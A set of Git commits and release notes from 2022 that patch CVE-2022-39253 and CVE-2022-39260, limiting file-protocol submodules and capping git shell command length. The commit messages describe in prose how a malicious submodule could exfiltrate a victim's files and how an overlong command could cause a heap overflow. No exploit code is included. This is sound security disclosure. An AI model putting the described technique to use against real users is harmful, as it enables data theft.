From a1d4f67c12ac172f835e6d5e4e0a197075e2146b Mon Sep 17 00:00:00 2001 From: Taylor Blau Date: Fri, 29 Jul 2022 15:22:13 -0400 Subject: transport: make `protocol.file.allow` be "user" by default An earlier patch discussed and fixed a scenario where Git could be used as a vector to exfiltrate sensitive data through a Docker container when a potential victim clones a suspicious repository with local submodules that contain symlinks. That security hole has since been plugged, but a similar one still exists. Instead of convincing a would-be victim to clone an embedded submodule via the "file" protocol, an attacker could convince an individual to clone a repository that has a submodule pointing to a valid path on the victim's filesystem. For example, if an individual (with username "foo") has their home directory ("/home/foo") stored as a Git repository, then an attacker could exfiltrate data by convincing a victim to clone a malicious repository containing a submodule pointing at "/home/foo/.git" with `--recurse-submodules`. Doing so would expose any sensitive contents in stored in "/home/foo" tracked in Git. For systems (such as Docker) that consider everything outside of the immediate top-level working directory containing a Dockerfile as inaccessible to the container (with the exception of volume mounts, and so on), this is a violation of trust by exposing unexpected contents in the working copy. To mitigate the likelihood of this kind of attack, adjust the "file://" protocol's default policy to be "user" to prevent commands that execute without user input (including recursive submodule initialization) from taking place by default. Suggested-by: Jeff King Signed-off-by: Taylor Blau --- Documentation/config/protocol.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) (limited to 'Documentation') diff --git a/Documentation/config/protocol.txt b/Documentation/config/protocol.txt index 756591d77b..799389132f 100644 --- a/Documentation/config/protocol.txt +++ b/Documentation/config/protocol.txt @@ -1,10 +1,10 @@ protocol.allow:: If set, provide a user defined default policy for all protocols which don't explicitly have a policy (`protocol..allow`). By default, - if unset, known-safe protocols (http, https, git, ssh, file) have a + if unset, known-safe protocols (http, https, git, ssh) have a default policy of `always`, known-dangerous protocols (ext) have a - default policy of `never`, and all other protocols have a default - policy of `user`. Supported policies: + default policy of `never`, and all other protocols (including file) + have a default policy of `user`. Supported policies: + -- -- cgit v1.3 From abd4d67ab0f84fff703fa14d9eebfd287b42daeb Mon Sep 17 00:00:00 2001 From: Taylor Blau Date: Fri, 30 Sep 2022 16:32:10 -0400 Subject: Git 2.30.6 Signed-off-by: Taylor Blau --- Documentation/RelNotes/2.30.6.txt | 60 +++++++++++++++++++++++++++++++++++++++ GIT-VERSION-GEN | 2 +- RelNotes | 2 +- 3 files changed, 62 insertions(+), 2 deletions(-) create mode 100644 Documentation/RelNotes/2.30.6.txt (limited to 'Documentation') diff --git a/Documentation/RelNotes/2.30.6.txt b/Documentation/RelNotes/2.30.6.txt new file mode 100644 index 0000000000..d649071b79 --- /dev/null +++ b/Documentation/RelNotes/2.30.6.txt @@ -0,0 +1,60 @@ +Git v2.30.6 Release Notes +========================= + +This release addresses the security issues CVE-2022-39253 and +CVE-2022-39260. + +Fixes since v2.30.5 +------------------- + + * CVE-2022-39253: + When relying on the `--local` clone optimization, Git dereferences + symbolic links in the source repository before creating hardlinks + (or copies) of the dereferenced link in the destination repository. + This can lead to surprising behavior where arbitrary files are + present in a repository's `$GIT_DIR` when cloning from a malicious + repository. + + Git will no longer dereference symbolic links via the `--local` + clone mechanism, and will instead refuse to clone repositories that + have symbolic links present in the `$GIT_DIR/objects` directory. + + Additionally, the value of `protocol.file.allow` is changed to be + "user" by default. + + * CVE-2022-39260: + An overly-long command string given to `git shell` can result in + overflow in `split_cmdline()`, leading to arbitrary heap writes and + remote code execution when `git shell` is exposed and the directory + `$HOME/git-shell-commands` exists. + + `git shell` is taught to refuse interactive commands that are + longer than 4MiB in size. `split_cmdline()` is hardened to reject + inputs larger than 2GiB. + +Credit for finding CVE-2022-39253 goes to Cory Snider of Mirantis. The +fix was authored by Taylor Blau, with help from Johannes Schindelin. + +Credit for finding CVE-2022-39260 goes to Kevin Backhouse of GitHub. +The fix was authored by Kevin Backhouse, Jeff King, and Taylor Blau. + + +Jeff King (2): + shell: add basic tests + shell: limit size of interactive commands + +Kevin Backhouse (1): + alias.c: reject too-long cmdline strings in split_cmdline() + +Taylor Blau (11): + builtin/clone.c: disallow `--local` clones with symlinks + t/lib-submodule-update.sh: allow local submodules + t/t1NNN: allow local submodules + t/2NNNN: allow local submodules + t/t3NNN: allow local submodules + t/t4NNN: allow local submodules + t/t5NNN: allow local submodules + t/t6NNN: allow local submodules + t/t7NNN: allow local submodules + t/t9NNN: allow local submodules + transport: make `protocol.file.allow` be "user" by default diff --git a/GIT-VERSION-GEN b/GIT-VERSION-GEN index 39d0c99da6..40fa0b5255 100755 --- a/GIT-VERSION-GEN +++ b/GIT-VERSION-GEN @@ -1,7 +1,7 @@ #!/bin/sh GVF=GIT-VERSION-FILE -DEF_VER=v2.30.5 +DEF_VER=v2.30.6 LF=' ' diff --git a/RelNotes b/RelNotes index 406d23844b..018a28eb07 120000 --- a/RelNotes +++ b/RelNotes @@ -1 +1 @@ -Documentation/RelNotes/2.30.5.txt \ No newline at end of file +Documentation/RelNotes/2.30.6.txt \ No newline at end of file -- cgit v1.3 From ecf9b4a443ecd2c7dc759e5d18f226694bc3eced Mon Sep 17 00:00:00 2001 From: Taylor Blau Date: Fri, 30 Sep 2022 16:56:02 -0400 Subject: Git 2.31.5 Signed-off-by: Taylor Blau --- Documentation/RelNotes/2.31.5.txt | 5 +++++ RelNotes | 2 +- 2 files changed, 6 insertions(+), 1 deletion(-) create mode 100644 Documentation/RelNotes/2.31.5.txt (limited to 'Documentation') diff --git a/Documentation/RelNotes/2.31.5.txt b/Documentation/RelNotes/2.31.5.txt new file mode 100644 index 0000000000..0d87e6e03f --- /dev/null +++ b/Documentation/RelNotes/2.31.5.txt @@ -0,0 +1,5 @@ +Git v2.31.5 Release Notes +========================= + +This release merges the security fix that appears in v2.30.6; see +the release notes for that version for details. diff --git a/RelNotes b/RelNotes index 7ef30395e1..6ed6c0c014 120000 --- a/RelNotes +++ b/RelNotes @@ -1 +1 @@ -Documentation/RelNotes/2.31.4.txt \ No newline at end of file +Documentation/RelNotes/2.31.5.txt \ No newline at end of file -- cgit v1.3 From af778cd9be6307e34f9f900fd42eb826c65b32da Mon Sep 17 00:00:00 2001 From: Taylor Blau Date: Fri, 30 Sep 2022 17:00:58 -0400 Subject: Git 2.32.4 Signed-off-by: Taylor Blau --- Documentation/RelNotes/2.32.4.txt | 5 +++++ RelNotes | 2 +- 2 files changed, 6 insertions(+), 1 deletion(-) create mode 100644 Documentation/RelNotes/2.32.4.txt (limited to 'Documentation') diff --git a/Documentation/RelNotes/2.32.4.txt b/Documentation/RelNotes/2.32.4.txt new file mode 100644 index 0000000000..76c67b209e --- /dev/null +++ b/Documentation/RelNotes/2.32.4.txt @@ -0,0 +1,5 @@ +Git v2.32.4 Release Notes +========================= + +This release merges the security fix that appears in v2.30.6; see +the release notes for that version for details. diff --git a/RelNotes b/RelNotes index 3bfb2b6297..2626c7807b 120000 --- a/RelNotes +++ b/RelNotes @@ -1 +1 @@ -Documentation/RelNotes/2.32.3.txt \ No newline at end of file +Documentation/RelNotes/2.32.4.txt \ No newline at end of file -- cgit v1.3 From 7800e1dccf622ba8d490b4c1c92af734be6242ff Mon Sep 17 00:00:00 2001 From: Taylor Blau Date: Fri, 30 Sep 2022 17:04:26 -0400 Subject: Git 2.33.5 Signed-off-by: Taylor Blau --- Documentation/RelNotes/2.33.5.txt | 5 +++++ GIT-VERSION-GEN | 2 +- RelNotes | 2 +- 3 files changed, 7 insertions(+), 2 deletions(-) create mode 100644 Documentation/RelNotes/2.33.5.txt (limited to 'Documentation') diff --git a/Documentation/RelNotes/2.33.5.txt b/Documentation/RelNotes/2.33.5.txt new file mode 100644 index 0000000000..a63652602b --- /dev/null +++ b/Documentation/RelNotes/2.33.5.txt @@ -0,0 +1,5 @@ +Git v2.33.5 Release Notes +========================= + +This release merges the security fix that appears in v2.30.6; see +the release notes for that version for details. diff --git a/GIT-VERSION-GEN b/GIT-VERSION-GEN index 473746835b..d7948f1653 100755 --- a/GIT-VERSION-GEN +++ b/GIT-VERSION-GEN @@ -1,7 +1,7 @@ #!/bin/sh GVF=GIT-VERSION-FILE -DEF_VER=v2.33.4 +DEF_VER=v2.33.5 LF=' ' diff --git a/RelNotes b/RelNotes index 6cb6ec27dc..9589e5e0e9 120000 --- a/RelNotes +++ b/RelNotes @@ -1 +1 @@ -Documentation/RelNotes/2.33.4.txt \ No newline at end of file +Documentation/RelNotes/2.33.5.txt \ No newline at end of file -- cgit v1.3 From be85cfc4dbef9ffa177770f8607fd4a85445565e Mon Sep 17 00:00:00 2001 From: Taylor Blau Date: Fri, 30 Sep 2022 17:22:02 -0400 Subject: Git 2.34.5 Signed-off-by: Taylor Blau --- Documentation/RelNotes/2.34.5.txt | 5 +++++ GIT-VERSION-GEN | 2 +- RelNotes | 2 +- 3 files changed, 7 insertions(+), 2 deletions(-) create mode 100644 Documentation/RelNotes/2.34.5.txt (limited to 'Documentation') diff --git a/Documentation/RelNotes/2.34.5.txt b/Documentation/RelNotes/2.34.5.txt new file mode 100644 index 0000000000..0e8999204d --- /dev/null +++ b/Documentation/RelNotes/2.34.5.txt @@ -0,0 +1,5 @@ +Git v2.34.5 Release Notes +========================= + +This release merges the security fix that appears in v2.30.6; see +the release notes for that version for details. diff --git a/GIT-VERSION-GEN b/GIT-VERSION-GEN index 9e2cf5d43d..87ff922834 100755 --- a/GIT-VERSION-GEN +++ b/GIT-VERSION-GEN @@ -1,7 +1,7 @@ #!/bin/sh GVF=GIT-VERSION-FILE -DEF_VER=v2.34.4 +DEF_VER=v2.34.5 LF=' ' diff --git a/RelNotes b/RelNotes index 9041e1b0fe..e3bb08499b 120000 --- a/RelNotes +++ b/RelNotes @@ -1 +1 @@ -Documentation/RelNotes/2.34.4.txt \ No newline at end of file +Documentation/RelNotes/2.34.5.txt \ No newline at end of file -- cgit v1.3